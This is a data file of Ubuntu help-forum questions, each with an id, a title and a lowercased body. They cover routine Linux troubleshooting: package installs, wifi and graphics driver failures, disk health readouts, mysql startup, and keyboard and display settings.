409370	closed captioning file	i am needing to convert a .cap file to either a .scc , .smpte-tt or a .sami file for closed captioning . does anyone know of any programs or software that is capable of doing this that works on ubuntu ? thanks . chris
409372	how one can install sagemath on ubuntu ?	i tried to install sagemath via command line but encountered a problem . am i doing something wrong ? i have ubuntu 13.10. jaakko @ jaakko-vpceb1s1e : ~ $ sudo apt-add-repository -y ppa : aims/sagemath gpg : keyring `/tmp/tmp7y1mxl/secring.gpg ' created gpg : keyring `/tmp/tmp7y1mxl/pubring.gpg ' created gpg : requesting key be796ff2 from hkp server keyserver.ubuntu.com gpg : /tmp/tmp7y1mxl/trustdb.gpg : trustdb created gpg : key be796ff2 : public key `` launchpad ppa for aims '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok jaakko @ jaakko-vpceb1s1e : ~ $ sudo apt-get update ign http : //fi.archive.ubuntu.com saucy inrelease ign http : //fi.archive.ubuntu.com saucy-updates inrelease ign http : //fi.archive.ubuntu.com saucy-backports inrelease ign http : //ppa.launchpad.net saucy inrelease hit http : //fi.archive.ubuntu.com saucy release.gpg hit http : //fi.archive.ubuntu.com saucy-updates release.gpg ign http : //extras.ubuntu.com saucy inrelease hit http : //ppa.launchpad.net saucy release.gpg hit http : //fi.archive.ubuntu.com saucy-backports release.gpg hit http : //fi.archive.ubuntu.com saucy release hit http : //ppa.launchpad.net saucy release hit http : //extras.ubuntu.com saucy release.gpg hit http : //fi.archive.ubuntu.com saucy-updates release hit http : //fi.archive.ubuntu.com saucy-backports release hit http : //extras.ubuntu.com saucy release ign http : //security.ubuntu.com saucy-security inrelease hit http : //ppa.launchpad.net saucy/main i386 packages hit http : //fi.archive.ubuntu.com saucy/main sources hit http : //fi.archive.ubuntu.com saucy/restricted sources hit http : //extras.ubuntu.com saucy/main sources hit http : //fi.archive.ubuntu.com saucy/universe sources hit http : //fi.archive.ubuntu.com saucy/multiverse sources hit http : //extras.ubuntu.com saucy/main i386 packages hit http : //fi.archive.ubuntu.com saucy/main i386 packages hit http : //security.ubuntu.com saucy-security release.gpg hit http : //fi.archive.ubuntu.com saucy/restricted i386 packages hit http : //fi.archive.ubuntu.com saucy/universe i386 packages hit http : //fi.archive.ubuntu.com saucy/multiverse i386 packages hit http : //fi.archive.ubuntu.com saucy/main translation-en hit http : //security.ubuntu.com saucy-security release hit http : //fi.archive.ubuntu.com saucy/multiverse translation-en hit http : //fi.archive.ubuntu.com saucy/restricted translation-en hit http : //security.ubuntu.com saucy-security/main sources hit http : //fi.archive.ubuntu.com saucy/universe translation-en hit http : //fi.archive.ubuntu.com saucy-updates/main sources ign http : //ppa.launchpad.net saucy/main translation-en_us hit http : //fi.archive.ubuntu.com saucy-updates/restricted sources hit http : //fi.archive.ubuntu.com saucy-updates/universe sources ign http : //ppa.launchpad.net saucy/main translation-en hit http : //fi.archive.ubuntu.com saucy-updates/multiverse sources hit http : //security.ubuntu.com saucy-security/restricted sources hit http : //fi.archive.ubuntu.com saucy-updates/main i386 packages hit http : //fi.archive.ubuntu.com saucy-updates/restricted i386 packages ign http : //extras.ubuntu.com saucy/main translation-en_us hit http : //fi.archive.ubuntu.com saucy-updates/universe i386 packages hit http : //fi.archive.ubuntu.com saucy-updates/multiverse i386 packages ign http : //extras.ubuntu.com saucy/main translation-en hit http : //security.ubuntu.com saucy-security/universe sources hit http : //fi.archive.ubuntu.com saucy-updates/main translation-en hit http : //fi.archive.ubuntu.com saucy-updates/multiverse translation-en hit http : //fi.archive.ubuntu.com saucy-updates/restricted translation-en hit http : //security.ubuntu.com saucy-security/multiverse sources hit http : //fi.archive.ubuntu.com saucy-updates/universe translation-en hit http : //fi.archive.ubuntu.com saucy-backports/main sources hit http : //fi.archive.ubuntu.com saucy-backports/restricted sources hit http : //fi.archive.ubuntu.com saucy-backports/universe sources hit http : //security.ubuntu.com saucy-security/main i386 packages hit http : //fi.archive.ubuntu.com saucy-backports/multiverse sources hit http : //fi.archive.ubuntu.com saucy-backports/main i386 packages hit http : //fi.archive.ubuntu.com saucy-backports/restricted i386 packages hit http : //fi.archive.ubuntu.com saucy-backports/universe i386 packages hit http : //fi.archive.ubuntu.com saucy-backports/multiverse i386 packages hit http : //security.ubuntu.com saucy-security/restricted i386 packages hit http : //fi.archive.ubuntu.com saucy-backports/main translation-en hit http : //fi.archive.ubuntu.com saucy-backports/multiverse translation-en hit http : //security.ubuntu.com saucy-security/universe i386 packages hit http : //fi.archive.ubuntu.com saucy-backports/restricted translation-en hit http : //fi.archive.ubuntu.com saucy-backports/universe translation-en hit http : //security.ubuntu.com saucy-security/multiverse i386 packages hit http : //security.ubuntu.com saucy-security/main translation-en hit http : //security.ubuntu.com saucy-security/multiverse translation-en ign http : //fi.archive.ubuntu.com saucy/main translation-en_us hit http : //security.ubuntu.com saucy-security/restricted translation-en ign http : //fi.archive.ubuntu.com saucy/multiverse translation-en_us ign http : //fi.archive.ubuntu.com saucy/restricted translation-en_us ign http : //fi.archive.ubuntu.com saucy/universe translation-en_us ign http : //fi.archive.ubuntu.com saucy-updates/main translation-en_us ign http : //fi.archive.ubuntu.com saucy-updates/multiverse translation-en_us ign http : //fi.archive.ubuntu.com saucy-updates/restricted translation-en_us ign http : //fi.archive.ubuntu.com saucy-updates/universe translation-en_us ign http : //fi.archive.ubuntu.com saucy-backports/main translation-en_us ign http : //fi.archive.ubuntu.com saucy-backports/multiverse translation-en_us ign http : //fi.archive.ubuntu.com saucy-backports/restricted translation-en_us hit http : //security.ubuntu.com saucy-security/universe translation-en ign http : //fi.archive.ubuntu.com saucy-backports/universe translation-en_us ign http : //security.ubuntu.com saucy-security/main translation-en_us ign http : //security.ubuntu.com saucy-security/multiverse translation-en_us ign http : //security.ubuntu.com saucy-security/restricted translation-en_us ign http : //security.ubuntu.com saucy-security/universe translation-en_us reading package lists ... done jaakko @ jaakko-vpceb1s1e : ~ $ sudo apt-get install sagemath-upstream-binary reading package lists ... done building dependency tree reading state information ... done package sagemath-upstream-binary is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'sagemath-upstream-binary ' has no installation candidate jaakko @ jaakko-vpceb1s1e : ~ $
409377	toshiba satellite l755 wireless internet drops	i know this question has been asked many times but i ca n't find a proper answer . i recently changed to ubuntu 12.04 lts which is amazing so far , but my only gripe about this so far is the internet constantly dropping every few minutes or so . what can i do to fix this ? edit : i have also tried updating everything via update manager and am upgraded all the way , i also turned off ipv6 with some help on prolonging the time the wi-fi drops .
409378	changing brightness at startup	my lenovo t440s starts up with maximum brightness . following this thread i have tried to alter rc.local , but this does not work . when i execute the command cat /sys/class/backlight/acpi_video0/brightness i get the output 851 . then i lower my brightness manually via the hotkeys and execute the command again - it still shows 851 . this leads me to believe that i can not control my brightness in this way by simply adding a command to rc.local . is there anything else i can try ? here is the grub content # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default= '' 0 '' grub_hidden_timeout= '' 0 '' grub_hidden_timeout_quiet= '' true '' grub_timeout= '' 2 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' # grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal= '' console '' # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode= '' 640x480 '' # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid= '' true '' # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' grub_disable_os_prober= '' true '' here is the rc.local content # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . # echo 2 > /sys/class/backlight/acpi_video0/brightness # echo 2 > /sys/class/backlight/intel_backlight/brightness # xrandr -- output edp1 -- brightness 0.3 rfkill block bluetooth # echo 3 > /sys/class/backlight/thinkpad_screen/brightness exit 0
409379	ubuntu desktop installation	i 've been searching on the internet for quite some time to find a solution . i 've been trying to install ubuntu desktop on a new computer build . i would like to install ubuntu desktop on a ssd and setup my 4 hdds in a raid 10 array . i mainly want to use it as a media server , but want the desktop version to possibly run windows programs also . is there any info you could suggest on out to install ubuntu with the os on the ssd and to keep all my files in a raid 10 array ? also my asus motherboard supports fakeraid would it be suggested to use that or ubuntu software raid ? thanks .
409382	can i optimize ubuntu for touch integration ?	i recently installed a usb touch screen to my toshiba satellite . can i optimize ubuntu 13.10 for touch integration ? i have heard of the new ubuntu touch , seemingly only for phones , but i was curious as to whether this same idea is possible on a desktop or laptop . all my computers run ubuntu ( i have around twenty six , feww ) so this would be a great help to set towards setting them each to their individual needs . i can not program coding but i can run the terminal quite well if that helps any .
409384	ubuntu update problem on my mx11 alienware laptop	i 'm new to linux and ubuntu , so i have no clue what im doing . i recently updated my laptop to 13.1 and it caused my cursor to turn into a cross and my toolbar at the bottom of the screen to disappear . also whenever i start a program , system settings for example , it does n't have the exit/minimize/maximize symbols at the top . what can i do to fix it ?
409385	sound defaulting to hdmi	i would like to know how to deafult my sound to always use headphones ? i plug my laptop via display port into an external monitor . whenever i restart ubuntu ( 13.04 ) the sound is always defaulted to hdmi/displayport . is there a way to override this ? my sound options are 1 ) hdmi/displayport ( built-in-audio ) 2 ) headphones ( built-in-audio )
409386	when downloading source packages from ubuntu what is the difference between *orig.tar.bz2 and *6ubuntu2.3.debian.tar.gz	i 'm taking a look at perl in the ubuntu packages and on the right panel under `` download source package '' i noticed 3 files http : //packages.ubuntu.com/precise/perl [ perl_5.14.2-6ubuntu2.3.dsc ] [ perl_5.14.2.orig.tar.bz2 ] [ perl_5.14.2-6ubuntu2.3.debian.tar.gz ] what is the difference between the last two files ?
409387	how to reset administrative password without the use of a `` p '' key .	so i do not know my administrative password . i read up on how to reset it by clicking left shift after the bios page upon start up . going to the recovery option , then root , then doing mount -o rw , remount / but then i believe i must do passwrd to change the password , however , my keyboard does not have a working `` p '' key . does any one know of an alternative way to reset the administrative password without the use of a 'p ' key ? if not , does anybody know of a clever way to utilize the letter 'p ' in the command prompt without a working key ? or perhaps anyone might know how to find out your password without having to change it at all ? thank you for your time .
409397	time and date not showing and the options are faded	i like being able to see the date and time in the upper-right hand portion of my screen . recently , my time and date have disappeared . i tried adjusting time and date through system settings . i noticed that the 'clock ' tab is faded and unadjustable . how can i fix the issue ? thanks
409398	dual-boot confusion	ok , so i recently used a lot of windows 7 and downloaded a bunch of stuff on there that i do n't want to use , so i am using a separate hard drive now with ubuntu . but on the linux os , it 's saying that i have n't got a lot of space left , i have n't downloaded anything except for maybe 5 or 6 small files and it 's saying that i have 500 megabytes left . i 'm pretty sure i 'm using a whole new hard drive that has 500 gigs of memory . i probably made a mistake during the setup and put only 700 or so megabytes in ubuntu , if i did please tell me how i can put more memory in ! picture of gparted : http : //imgur.com/3r67uky ( i meant megabytes , sorry ! )
409402	installing wacom drivers	alright , i installed ubuntu 13.10 the other day and i 'm loving it except for one thing : my wacom intuos pen and touch ( cth-480 ) does n't work . i 've tried to install the drivers from sourceforge ( http : //sourceforge.net/apps/mediawiki/linuxwacom/index.php ? title=input-wacom ) to no avail . i 've been searching the internet for several days now but i have n't found anything pertaining to my version and my tablet . keep in mind i know next to nothing about ubuntu . thanks !
409405	adding radio station to rhythmbox	the only reason why i install banshee on my new ubuntu distros is because i can not seem to be able to add my favorite radio station to rhythmbox . i would like to add this radio station to rhythmbox http : //live-icy.gss.dr.dk:80/a/a05h.mp3 i press add radio and enter the radio url in this box : now when i try to start the radio nothing happens any help appreciated edit 1 ubuntu 13.10 rhythmbox 2.99.1
409406	cat and pipe to run command wo n't take two arguments	i have been using this command : cat urls.txt | xargs -n 1 -p 10 wget -q to download text files of urls . this worked fine when my url file was like : http : //domain1.com/page.html http : //domain2.com/page.html http : //domain3.com/page.html however i now need to download text files of urls and post data , like : -- post-data '1=1 ' http : //domain1.com/page.html -- post-data '1=1 ' http : //domain2.com/page.html -- post-data '1=1 ' http : //domain3.com/page.html when using the above cat command it tries to download the url and then the post data as a url . e.g . in the above example , it would download http : //domain1.com/page.html and then try and download -- post-data 1=1 , then http : //domain2.com/page.html and so on . is there anyway to get cat to send each line of the urls files only ? update : i 've found that by adding an escape to the space like : -- post-data '1=1'\ http : //domain1.com/page.html is making it be treated as one url , but the -- appear to be stripped from the -- post-data argument .
409410	how to install ulteo open virtual desktop on ubuntu 13.10 ?	has anyone installed ulteo open virtual desktop on ubuntu 13.10 ? i can not locate a .deb or a compressed ( tar , zip ) file containing the binaries .
409411	authenticate in network share ( samba ) without having to mount explicitly	i have this code in which i have to access a large number of dirs , some of them are network shares , looking for specific files . in windows , i just do `` net use //server/share /user : username password '' and voilรก ! i can can go to the dir as if it was in my local machine . how can i do the same in linux ? i know that i can mount the share to a specific folder in my machine but that would imply managing a lot of dirs and i would really like to avoid that . just like when i do it in windows . thanks in advance !
409412	why do i need administrative privileges to use chsh ?	i was working on a ubuntu system where i did not have administrative privileges , and i could n't change shells ( from tcsh to bash ) using chsh . i solved the problem writing in the .tcshrc to open bash . i ca n't understand why i need admin privileges to use chsh in my own home directory . in case i need privileges because chsh changes something in the /etc folder , how is this any different to changing my password ? i can change my password even though i 'm not an admin , and this also makes changes within /etc . what 's the difference between changing my password and changing my shell ?
409414	previously working external hard drive suddenly not detected - ubuntu 12.04	i 'm running ubuntu 12.04 on a lenovo ideapad z580 and have been using the default backup application with an external sataiii hard drive . however , when i connected it via usb today , it did n't show up in the file browser like usual , and the backup application does n't recognize that it 's connected . i remember bumping the hdd a little harshly the night before , so i 'm hoping i did n't do something totally evil to it . maybe it 's not recoverable , but if it 's not i 'd like to know . i 'm in the midst of writing a thesis , and backing that up via the internet is a bit annoying ... i like to think of myself as at least competent with these sorts of things , but after browsing other forum posts and solutions , nothing has worked so far to get things running as usual . some of this may be useful : john @ euclid : ~ $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xcdbeaa35 device boot start end blocks id system /dev/sda1 1 1465149167 732574583+ ee gpt partition 1 does not start on physical sector boundary . also : john @ euclid : ~ $ df -th filesystem type size used avail use % mounted on /dev/sda2 ext4 680g 81g 565g 13 % / udev devtmpfs 3.9g 4.0k 3.9g 1 % /dev tmpfs tmpfs 1.6g 924k 1.6g 1 % /run none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 3.9g 612k 3.9g 1 % /run/shm /dev/sda1 vfat 94m 2.1m 92m 3 % /boot/efi and : john @ euclid : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 004 : id 13fd:0840 initio corporation bus 003 device 002 : id 5986:0295 acer , inc bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 046d : c52f logitech , inc. wireless mouse m305 bus 001 device 004 : id 0bda:0139 realtek semiconductor corp . bus 001 device 005 : id 0489 : e042 foxconn / hon hai all of the above commands were run while the hdd was on , connected to power , and connected to my laptop via usb . i wish i could remember how i originally formatted the hdd , but it was at least a year ago and i did n't write down what i did ... with my limited knowledge about mounting , to me it looks like it is mounting fine , but maybe not in the right place ? /boot/efi seems like a weird place to me ... any advice ? edit : sorry guys , i was n't paying attention at all to the storage space listings ... whatever i had been thinking about mounting at /boot/efi and about /dev/sda was wrong because the available space never matched what i should have expected ( 320g ) . i 've concluded that the hard drive was actually fried , as suggested , and have since gotten a replacement .
409418	how to get flash working on abuntu 13.10	please can some one help me i read you can and you cant all at the same time . i need to know when you go to the flash site there seems to be 3 or 4 version non of which are abuntu 13.10 i take it why the solves i seen look so complex that you have to rewrite things . so i need a step by step guide in simple terms it will hopefully help me for the future , i am an advanced pc user and pretty good on macs , but my exp with lynux is limited i have made the change . trouble is all i use my laptop for is streaming football on ideally acestream ( which i have also read mixed reports or lynux ) or flash sites . and sadly yes i play the odd flash game . so please can you help
409419	how to install ubuntu 13.04 on to a usb	i 'm trying to install ubuntu 13.04 to a 32gb usb stick so i can bring it to and from school . i 've install about three time now using the something else install method and every time i install it says something like this `` installation complete please restart your computer '' . when i restart the computer and hold down alt ( due to the fact that i 'm on mac ) the usb does n't show up as a bootable thing . when i go to reinstall it to the usb useing a cd it says that it is installed on it . so i want to know how to fix this note ( i do n't want the iso on the usb thats on the cd . i want the os on the usb so i can bring to and from school ) computer specs for home and school they are macs if they were pc this would be sooo much easier saying how i 've installed it on pc before but not mac and a usb together
409421	my ssd now has 226 bad sectors . is that significant ?	ubuntu 13.04 . the number of bad sectors on my ssd has steadily increased until 226 bad sectors today . the thing is , i do n't know whether 226 bad sectors is 0.0001 % of the ssd , 1 % of the ssd , or 99 % of the ssd . i have n't found anything on the internet this morning to answer this question . the disks utility does n't tell me either , and i ca n't find the information in smart data . sudo smartctl -a /dev/sda shows this : smartctl 5.43 2012-06-30 r3573 [ x86_64-linux-3.8.0-31-generic ] ( local build ) copyright ( c ) 2002-12 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === device model : samsung ssd 840 pro series serial number : s1atnead645474h lu wwn device id : 5 002538 5503c15c0 firmware version : dxm05b0q user capacity : 256,060,514,304 bytes [ 256 gb ] sector size : 512 bytes logical/physical device is : not in smartctl database [ for details use : -p showall ] ata version is : 8 ata standard is : ata-8-acs revision 4c local time is : fri jan 24 20:37:08 2014 cst smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x00 ) offline data collection activity was never started . auto offline data collection : disabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 53956 ) seconds . offline data collection capabilities : ( 0x53 ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . no offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 20 ) minutes . sct capabilities : ( 0x003d ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 1 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 5 reallocated_sector_ct 0x0033 097 097 010 pre-fail always - 238 9 power_on_hours 0x0032 099 099 000 old_age always - 1331 12 power_cycle_count 0x0032 099 099 000 old_age always - 341 177 wear_leveling_count 0x0013 097 097 000 pre-fail always - 75 179 used_rsvd_blk_cnt_tot 0x0013 097 097 010 pre-fail always - 238 181 program_fail_cnt_total 0x0032 097 097 010 old_age always - 238 182 erase_fail_count_total 0x0032 100 100 010 old_age always - 0 183 runtime_bad_block 0x0013 097 097 010 pre-fail always - 238 187 reported_uncorrect 0x0032 100 100 000 old_age always - 0 190 airflow_temperature_cel 0x0032 067 062 000 old_age always - 33 195 hardware_ecc_recovered 0x001a 200 200 000 old_age always - 0 199 udma_crc_error_count 0x003e 099 099 000 old_age always - 1 235 unknown_attribute 0x0012 099 099 000 old_age always - 128 241 total_lbas_written 0x0032 099 099 000 old_age always - 33308592070 smart error log version : 1 no errors logged smart self-test log structure revision number 1 no self-tests have been logged . [ to run self-tests , use : smartctl -t ] smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing 255 0 65535 read_scanning was never started selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay .
409423	what is the best text editor for coding ?	i plan to code in c/c++ . sublime text is so awesome it makes me want to code more . i played around with gedit , made it display the line numbers , put the dark skin on it , etc . , but i still like sublime the most . are there other text editors which are as good/cool ?
409430	how to use specific display/monitor when process is started	on ubuntu 12.04 desktop . i have two monitors attached to my system which works great . i normally work in eclipse and do have gui applications launching from eclipse for debugging . i would like to put newly launched application on other monitor that eclipse . by habit , my eclipse is almost always in right monitor and i would like to launch my application in left monitor by default . currently system starts it in whatever monitor focus seems to be . if i immediately click in other monitor , application does start in other monitor . is there any way i can configure so that processes started from eclipse ( either based on process name or other parameters ) will go to monitor i want by default .
409433	wifi stops working after a few minutes	this is my second posting related to wifi problems in the same computer . in my first post i managed to solve my problem ( wifi would not connect at all ) after upgrading the firmware to iwlwifi-7260-7.ucode ( it was looking for a non-existing and probably obsolete iwlwifi-7260-6.ucode ) . after this upgrade the wifi started working perfectly but only until a power-off or reboot . after rebooting the wifi would work only for a few minutes ( the wired connection works great though ) . below is the end of dmesg with all the error messages [ 8134.983623 ] iwlwifi 0000:03:00.0 : failed to update mac 0c:8b : fd:7b : b4 : bb [ 8134.983625 ] iwlwifi 0000:03:00.0 : failed to update power mode [ 8134.983664 ] iwlwifi 0000:03:00.0 : set key failed [ 8134.983665 ] iwlwifi 0000:03:00.0 : failed to find station id [ 8134.983666 ] iwlwifi 0000:03:00.0 : set key failed [ 8134.983674 ] iwlwifi 0000:03:00.0 : failed to send quota : -5 [ 8134.983675 ] iwlwifi 0000:03:00.0 : failed to update quotas after restart ( -5 ) [ 8177.504219 ] iwlwifi 0000:03:00.0 : scan failed ! status 0x1 ret -5 basically i found only two ways to restablish the wifi 1 ) reboot.after reboot it works for about 5 minutes and then stops working 2 ) under the wifi icon , unclick `` enable wireless '' and then unclick `` enable networking '' followed by the inverse ( that is , click enable networking and later enable wireless in this order ) i tried to upgrade to ubuntu 13 ( i 'm using 12.04 ) but with no luck . i 've given up on this issue and hoping the next lts in april might solve this issue but if there is any other suggestion out there from somebody that can understand the error messages i posted above i would be very thankful .
409434	wifi not connecting ( asus n76vz + intel centrino 2230 + ubuntu 13.04 )	i have recently installed ubuntu 13.04 alongside windows 8.1 . the wifi is detecting the other wifi devices but when i try to connect , it goes on and on and then it doesn ' connect . i have tried the additional drivers but nothing appears in that list . can you help me please .
409436	ubuntu 13.10 documents folder disappeared	i had some ebooks in my documents folder and i was looking at a few of them with document viewer . i was also using r studio and i was trying to change my working directory to documents/ ... but then i noticed that i could n't set my wd to where i wanted it because /documents did n't exist . i was confused went to file manager clicked on documents and it said it did n't exist . restarted , assuming it was just a hiccup but my documents folder was gone along with all of my documents . is there a way that i can get my files back and the document folder back ? what the hell happened ?
409437	vim does not refresh properly	i have a vm box with lamp installed i use the shell ( with ubuntu 12 ) to connect to the vm box and real server ( dell poweredge ) , every time i press page up or page down , the screen does not get refreshed on both vms and physical servers . both vm and real server have this config : 2 gigs ram 1,8g processor 250g hdd 2 x gigabit lan port # 1 used , port # 2 not used both are plugged to a 1u switch all servers has ubuntu server 12.04 client 's computer : 3.2 g i5 , 16g ram , ssd , nvidia gtx550ti with ubuntu 12.04 i tried this solution : http : //stackoverflow.com/questions/7078538/refresh-vim-buffer works but it 's a pain to do every time i press up arrow , page up etc ... i have this in my .vimrc : set nowrap set showmatch set tabstop=4 set shiftwidth=4 '' set expandtab set ruler set foldcolumn=2 set nowrap nmap < f8 > : set wrap ! wrap ? < cr > '' nmap < f6 > : e /tmp/a < cr > '' nmap < f7 > : w ! /tmp/a\| wq ! < cr > '' change // style comment to phpdoc comment map < c-p > : ! php -l % < cr > set hlsearch '' set incsearch set background=dark '' set textwidth=1000 '' set number '' set backspace=indent , eol , start set noshowmatch syntax on let g : loaded_matchparen=1 : set nocp is there a solution to fix the problem ?
409439	does lyx dump files somewhere when the os crashes ?	i have a very disturbing problem running lyx with ubuntu 12.04 on my dell inspiron . ever since i purchased this laptop and installed ubuntu 12.04 , it periodically freezes and nothing can be done to wake it up except a hard reset . that by itself is not a huge deal as i am always saving important files , etc . however , three separate times now , when i am working in lyx and the freeze happens both the file that was open in lyx and the backup file ( filename.lyx~ ) are completely destroyed . after reboot , the files still appear in the file system but are of size 0 kb . needless to say , this is a dire situation to encounter and requires constantly backing files on a flash disk or remote machine . has anyone else had this problem ? or , any ideas what might have happened to those files ? perhaps lyx backs them up somewhere else temporarily , and they are stuck there when the os crashes ? i could n't find a single crash log or any other useful information . but i will gladly post other technical details if they are of use in diagnosing the problem . thank you !
409441	lts for 12.04.02	since 12.04 is an lts version , does that means that it will have long support no matter what 12.04.x it is ? e.g . : can i have 12.04.01 and still be supported until 2017 ?
409443	how to assign a command to a single keypress	i want to run some commands when certain single keys are pressed . specifically , i have a volume up key and a volume down key and want to assign the following commands to these keys : volume up : pactl set-sink-volume 1 +10 % volume down : pactl set-sink-volume 1 -10 % how could i go about doing this ? would you have any pointers ?
409447	xubuntu 13.10 and wacom bamboo problem	i 'm trying to install my wacom bamboo pad on xubuntu 13.10 . i 've followed set by step what is here : http : //sourceforge.net/apps/mediawiki/linuxwacom/index.php ? title=downloads but still ca n't get it working . the pad is being recognised , and the light indicator is on . one thing i 've noticed though is that running the command xsetwacom -- list gives nothing and i ca n't find `` wacom '' in /dev/input/ my kernel version is 3.11.0-15-generic do n't know what else to do to fix my problem . thanks .
409450	pny microsd card not detected in ubuntu 13.10 laptop	when i run the `` lspci '' command , it shows the card reader in my dell vostro 1720 is listed as : 1a:00.1 sd host controller : o2 micro , inc . integrated mmc/sd controller ( rev 01 ) however , when i insert my pny micro sd card into the slot , it is not recognized . how do i install a driver that will recognize when i insert an sd card into the slot ?
409451	ssh with virtualbox	how do i ssh into ubuntu from an outside network ? it 's running in virtualbox and the network adapter as to remain nat . i ca n't seem to figure out how to set it up . are there any ways to directly ssh into the virtualbox session ?
409453	modifying the appearance of gvim	i wanted to set the color scheme of gvim to 'evening ' and have line numbers displayed everytime i start . but i ca n't find the right .gvimrc file and how can i set these default settings . help much appreciated . thanks !
409455	mysql wo n't start after removing bind-address	so , i am running mysql on an ubuntu server ( command-line ) virtualbox , on a windows 7 host . in the virtual machine , i changed the /etc/mysql/my.cnf file by commenting out the line bind-address = 127.0.0.1 so it looks like # bind-address = 127.0.0.1 i then restarted the server like so : perrin @ linuxserver1 : ~ $ sudo /etc/init.d/mysql restart [ sudo ] password for perrin : * stopping mysql database server mysqld [ ok ] * starting mysql database server mysqld [ ok ] after this , i started getting this error whenever i try to connect to mysql , like so : perrin @ linuxserver1 : ~ $ mysql -u root -p enter password : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/ run/mysqld/mysqld.sock ' ( 2 ) i searched for help and found out that my mysql server was not running , even though it had said [ ok ] when starting back up . ( lying p.o.s . ) so i try to start it , using both start and restart like so : perrin @ linuxserver1 : ~ $ sudo /etc/init.d/mysql start * starting mysql database server mysqld [ fail ] perrin @ linuxserver1 : ~ $ sudo /etc/init.d/mysql restart * stopping mysql database server mysqld [ ok ] * starting mysql database server mysqld [ fail ] so i go back to the my.cnf and un-comment the bind-address = 127.0.0.1 line , so that everything is exactly as it was before , and try again to start/restart the server . it fails again in exactly the same way . i 've searched all over the web for help and found a few similar problems people were having , but nothing ultimately useful , or that gave me any tips that led to a solution . does anyone have any idea what is going on here ? i 'm stumped .
409456	hp all in one printer 2512 problems	i have just installed linux and trying to install hp printer . the computer recognizes the printer but will not print . how do i get the printer to print ?
409463	change permissions	i need to change permission for all the files on my hard disk [ not system files ] . i have retrieved more than 1.2 lack files and i need permissions to delete or write those files .
409465	nvidia gtx 755 with bumblebee - failed to initialize the nvidia gpu at pci:1:0:0 - lenovo y410p	i installed bumblebee with nvidia-331 . i expected optirun glmark2 to run glmark2 but i got an error . $ optirun glmark2 [ 785.642896 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( gpu-0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 785.642945 ] [ error ] aborting because fallback start is disabled . lenovo y410p vga compatible controllers $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 755m ] ( rev a1 ) kernal.log ( part ) jan 22 16:17:49 io kernel : [ 158.189147 ] vgaarb : device changed decodes : pci:0000:01:00.0 , olddecodes=io+mem , decodes=none : owns=none jan 22 16:17:49 io kernel : [ 158.189256 ] [ drm ] initialized nvidia-drm 0.0.0 20130102 for 0000:01:00.0 on minor 1 jan 22 16:17:49 io kernel : [ 158.189260 ] nvrm : loading nvidia unix x86_64 kernel module 331.38 wed jan 8 19:32:30 pst 2014 jan 22 16:17:50 io kernel : [ 159.695466 ] nvidia 0000:01:00.0 : irq 51 for msi/msi-x jan 22 16:17:50 io kernel : [ 159.700843 ] nvrm : failed to copy vbios to system memory . jan 22 16:17:50 io kernel : [ 159.703143 ] nvrm : rminitadapter failed ! ( 0x30:0xffffffff:720 ) jan 22 16:17:50 io kernel : [ 159.703148 ] nvrm : rm_init_adapter failed for device bearing 